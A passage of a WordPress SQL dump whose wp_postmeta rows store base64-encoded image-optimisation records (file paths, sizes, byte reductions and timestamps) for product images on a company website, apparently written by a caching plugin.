INSERT INTO `wp_postmeta` VALUES (28933, 1949, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvRVBJUkVaLmpwZyIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvRVBJUkVaLmpwZyIsIndpZHRoIjo0OTI4LCJoZWlnaHQiOjMyNjQsIm1pbWVfdHlwZSI6IiIsImVycm9yX2NvZGUiOjksInRpbWUiOjE0ODM1NTAzODgsImlkIjoiMTk0OSJ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvRVBJUkVaLTM0MHgzNDAuanBnIiwid2lkdGgiOjM0MCwiaGVpZ2h0IjozNDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvRVBJUkVaLTM0MHgzNDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvRVBJUkVaLTM0MHgzNDAuanBnIiwicmVkdWN0aW9uIjo3MjIsInRpbWUiOjE0ODM1NTAzOTEsImlkIjoxOTQ5fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL0VQSVJFWi04MDB4NTMwLmpwZyIsIndpZHRoIjo4MDAsImhlaWdodCI6NTMwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL0VQSVJFWi04MDB4NTMwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL0VQSVJFWi04MDB4NTMwLmpwZyIsInJlZHVjdGlvbiI6MTQzMCwidGltZSI6MTQ4MzU1MDM5NSwiaWQiOjE5NDl9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvRVBJUkVaLTc2OHg1MDkuanBnIiwid2lkdGgiOjc2OCwiaGVpZ2h0Ijo1MDksInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvRVBJUkVaLTc2OHg1MDkuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvRVBJUkVaLTc2OHg1MDkuanBnIiwicmVkdWN0aW9uIjoxMzQwLCJ0aW1lIjoxNDgzNTUwMzk5LCJpZCI6MTk0OX0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9FUElSRVotMTYwMHgxMDYwLmpwZyIsIndpZHRoIjoxNjAwLCJoZWlnaHQiOjEwNjAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvRVBJUkVaLTE2MDB4MTA2MC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9FUElSRVotMTYwMHgxMDYwLmpwZyIsInJlZHVjdGlvbiI6Mzg1OCwidGltZSI6MTQ4MzU1MDQwNCwiaWQiOjE5NDl9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvRVBJUkVaLTI1MHgyNTAuanBnIiwid2lkdGgiOjI1MCwiaGVpZ2h0IjoyNTAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvRVBJUkVaLTI1MHgyNTAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvRVBJUkVaLTI1MHgyNTAuanBnIiwicmVkdWN0aW9uIjo2NzUsInRpbWUiOjE0ODM1NTA0MDgsImlkIjoxOTQ5fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL0VQSVJFWi0yMDB4MjAwLmpwZyIsIndpZHRoIjoyMDAsImhlaWdodCI6MjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL0VQSVJFWi0yMDB4MjAwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL0VQSVJFWi0yMDB4MjAwLmpwZyIsInJlZHVjdGlvbiI6NTE5LCJ0aW1lIjoxNDgzNTUwNDExLCJpZCI6MTk0OX0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9FUElSRVotMjI1eDIyNS5qcGciLCJ3aWR0aCI6MjI1LCJoZWlnaHQiOjIyNSwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9FUElSRVotMjI1eDIyNS5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9FUElSRVotMjI1eDIyNS5qcGciLCJyZWR1Y3Rpb24iOjU2OSwidGltZSI6MTQ4MzU1MDQxNCwiaWQiOjE5NDl9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvRVBJUkVaLTUxMHg2MDAuanBnIiwid2lkdGgiOjUxMCwiaGVpZ2h0Ijo2MDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvRVBJUkVaLTUxMHg2MDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvRVBJUkVaLTUxMHg2MDAuanBnIiwicmVkdWN0aW9uIjoxMjgwLCJ0aW1lIjoxNDgzNTUwNDE4LCJpZCI6MTk0OX0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL0VQSVJFWi0yMjV4MzYwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL0VQSVJFWi0yMjV4MzYwLmpwZyIsIndpZHRoIjoiMjI1IiwiaGVpZ2h0IjoiMzYwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL0VQSVJFWi0yMjV4MzYwLmpwZyIsInJlZHVjdGlvbiI6ODE3LCJ0aW1lIjoxNDgzNTUwNDIyLCJpZCI6MTk0OX0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL0VQSVJFWi00NTB4Mjk4LmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL0VQSVJFWi00NTB4Mjk4LmpwZyIsIndpZHRoIjoiNDUwIiwiaGVpZ2h0IjoiMjk4IiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL0VQSVJFWi00NTB4Mjk4LmpwZyIsInJlZHVjdGlvbiI6OTYxLCJ0aW1lIjoxNDgzNTUwNDI2LCJpZCI6MTk0OX1d'); 
INSERT INTO `wp_postmeta` VALUES (28934, 1948, 'wpfc_optimisation_reduction', '10256'); 
INSERT INTO `wp_postmeta` VALUES (28935, 1948, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwva3J5dG94LWdwbC1zZXJpZXMuanBnIiwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9rcnl0b3gtZ3BsLXNlcmllcy5qcGciLCJ3aWR0aCI6NTYxNiwiaGVpZ2h0IjozNzQ0LCJtaW1lX3R5cGUiOiIiLCJlcnJvcl9jb2RlIjo5LCJ0aW1lIjoxNDgzNTUwNDMwLCJpZCI6IjE5NDgifSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL2tyeXRveC1ncGwtc2VyaWVzLTM0MHgzNDAuanBnIiwid2lkdGgiOjM0MCwiaGVpZ2h0IjozNDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwva3J5dG94LWdwbC1zZXJpZXMtMzQweDM0MC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9rcnl0b3gtZ3BsLXNlcmllcy0zNDB4MzQwLmpwZyIsInJlZHVjdGlvbiI6NjYxLCJ0aW1lIjoxNDgzNTUwNDM0LCJpZCI6MTk0OH0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9rcnl0b3gtZ3BsLXNlcmllcy04MDB4NTMzLmpwZyIsIndpZHRoIjo4MDAsImhlaWdodCI6NTMzLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL2tyeXRveC1ncGwtc2VyaWVzLTgwMHg1MzMuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwva3J5dG94LWdwbC1zZXJpZXMtODAweDUzMy5qcGciLCJyZWR1Y3Rpb24iOjExOTEsInRpbWUiOjE0ODM1NTA0MzgsImlkIjoxOTQ4fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL2tyeXRveC1ncGwtc2VyaWVzLTc2OHg1MTIuanBnIiwid2lkdGgiOjc2OCwiaGVpZ2h0Ijo1MTIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwva3J5dG94LWdwbC1zZXJpZXMtNzY4eDUxMi5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9rcnl0b3gtZ3BsLXNlcmllcy03Njh4NTEyLmpwZyIsInJlZHVjdGlvbiI6MTI4MSwidGltZSI6MTQ4MzU1MDQ0MiwiaWQiOjE5NDh9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwva3J5dG94LWdwbC1zZXJpZXMtMTYwMHgxMDY3LmpwZyIsIndpZHRoIjoxNjAwLCJoZWlnaHQiOjEwNjcsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwva3J5dG94LWdwbC1zZXJpZXMtMTYwMHgxMDY3LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL2tyeXRveC1ncGwtc2VyaWVzLTE2MDB4MTA2Ny5qcGciLCJyZWR1Y3Rpb24iOjI4MzksInRpbWUiOjE0ODM1NTA0NDcsImlkIjoxOTQ4fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL2tyeXRveC1ncGwtc2VyaWVzLTI1MHgyNTAuanBnIiwid2lkdGgiOjI1MCwiaGVpZ2h0IjoyNTAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwva3J5dG94LWdwbC1zZXJpZXMtMjUweDI1MC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9rcnl0b3gtZ3BsLXNlcmllcy0yNTB4MjUwLmpwZyIsInJlZHVjdGlvbiI6NjM5LCJ0aW1lIjoxNDgzNTUwNDUwLCJpZCI6MTk0OH0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9rcnl0b3gtZ3BsLXNlcmllcy0yMDB4MjAwLmpwZyIsIndpZHRoIjoyMDAsImhlaWdodCI6MjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL2tyeXRveC1ncGwtc2VyaWVzLTIwMHgyMDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwva3J5dG94LWdwbC1zZXJpZXMtMjAweDIwMC5qcGciLCJyZWR1Y3Rpb24iOjUxNCwidGltZSI6MTQ4MzU1MDQ1MywiaWQiOjE5NDh9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwva3J5dG94LWdwbC1zZXJpZXMtMjI1eDIyNS5qcGciLCJ3aWR0aCI6MjI1LCJoZWlnaHQiOjIyNSwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9rcnl0b3gtZ3BsLXNlcmllcy0yMjV4MjI1LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL2tyeXRveC1ncGwtc2VyaWVzLTIyNXgyMjUuanBnIiwicmVkdWN0aW9uIjo1MzgsInRpbWUiOjE0ODM1NTA0NTYsImlkIjoxOTQ4fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL2tyeXRveC1ncGwtc2VyaWVzLTUxMHg2MDAuanBnIiwid2lkdGgiOjUxMCwiaGVpZ2h0Ijo2MDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwva3J5dG94LWdwbC1zZXJpZXMtNTEweDYwMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9rcnl0b3gtZ3BsLXNlcmllcy01MTB4NjAwLmpwZyIsInJlZHVjdGlvbiI6MTAwNiwidGltZSI6MTQ4MzU1MDQ2MSwiaWQiOjE5NDh9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9rcnl0b3gtZ3BsLXNlcmllcy0yMjV4MzYwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL2tyeXRveC1ncGwtc2VyaWVzLTIyNXgzNjAuanBnIiwid2lkdGgiOiIyMjUiLCJoZWlnaHQiOiIzNjAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwva3J5dG94LWdwbC1zZXJpZXMtMjI1eDM2MC5qcGciLCJyZWR1Y3Rpb24iOjczNywidGltZSI6MTQ4MzU1MDQ2NSwiaWQiOjE5NDh9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9rcnl0b3gtZ3BsLXNlcmllcy00NTB4MzAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL2tyeXRveC1ncGwtc2VyaWVzLTQ1MHgzMDAuanBnIiwid2lkdGgiOiI0NTAiLCJoZWlnaHQiOiIzMDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwva3J5dG94LWdwbC1zZXJpZXMtNDUweDMwMC5qcGciLCJyZWR1Y3Rpb24iOjg1MCwidGltZSI6MTQ4MzU1MDQ2OSwiaWQiOjE5NDh9XQ=='); 
INSERT INTO `wp_postmeta` VALUES (28936, 1947, 'wpfc_optimisation_reduction', '3017432'); 
INSERT INTO `wp_postmeta` VALUES (28937, 1947, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvRVBPTkVYLVVWLXJlc2lzdGFuY2UuanBnIiwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9FUE9ORVgtVVYtcmVzaXN0YW5jZS5qcGciLCJ3aWR0aCI6NDkyOCwiaGVpZ2h0IjozMjY0LCJtaW1lX3R5cGUiOiIiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvRVBPTkVYLVVWLXJlc2lzdGFuY2UuanBnIiwicmVkdWN0aW9uIjozMDE3NDIyLCJ0aW1lIjoxNDgzNTUwNDgwLCJpZCI6IjE5NDcifSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL0VQT05FWC1VVi1yZXNpc3RhbmNlLTM0MHgzNDAuanBnIiwid2lkdGgiOjM0MCwiaGVpZ2h0IjozNDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvRVBPTkVYLVVWLXJlc2lzdGFuY2UtMzQweDM0MC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9FUE9ORVgtVVYtcmVzaXN0YW5jZS0zNDB4MzQwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU1MDQ4MywiaWQiOjE5NDd9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvRVBPTkVYLVVWLXJlc2lzdGFuY2UtODAweDUzMC5qcGciLCJ3aWR0aCI6ODAwLCJoZWlnaHQiOjUzMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9FUE9ORVgtVVYtcmVzaXN0YW5jZS04MDB4NTMwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL0VQT05FWC1VVi1yZXNpc3RhbmNlLTgwMHg1MzAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTUwNDg3LCJpZCI6MTk0N30seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9FUE9ORVgtVVYtcmVzaXN0YW5jZS03Njh4NTA5LmpwZyIsIndpZHRoIjo3NjgsImhlaWdodCI6NTA5LCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL0VQT05FWC1VVi1yZXNpc3RhbmNlLTc2OHg1MDkuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvRVBPTkVYLVVWLXJlc2lzdGFuY2UtNzY4eDUwOS5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NTA0OTAsImlkIjoxOTQ3fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL0VQT05FWC1VVi1yZXNpc3RhbmNlLTE2MDB4MTA2MC5qcGciLCJ3aWR0aCI6MTYwMCwiaGVpZ2h0IjoxMDYwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL0VQT05FWC1VVi1yZXNpc3RhbmNlLTE2MDB4MTA2MC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9FUE9ORVgtVVYtcmVzaXN0YW5jZS0xNjAweDEwNjAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTUwNDk0LCJpZCI6MTk0N30seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9FUE9ORVgtVVYtcmVzaXN0YW5jZS0yNTB4MjUwLmpwZyIsIndpZHRoIjoyNTAsImhlaWdodCI6MjUwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3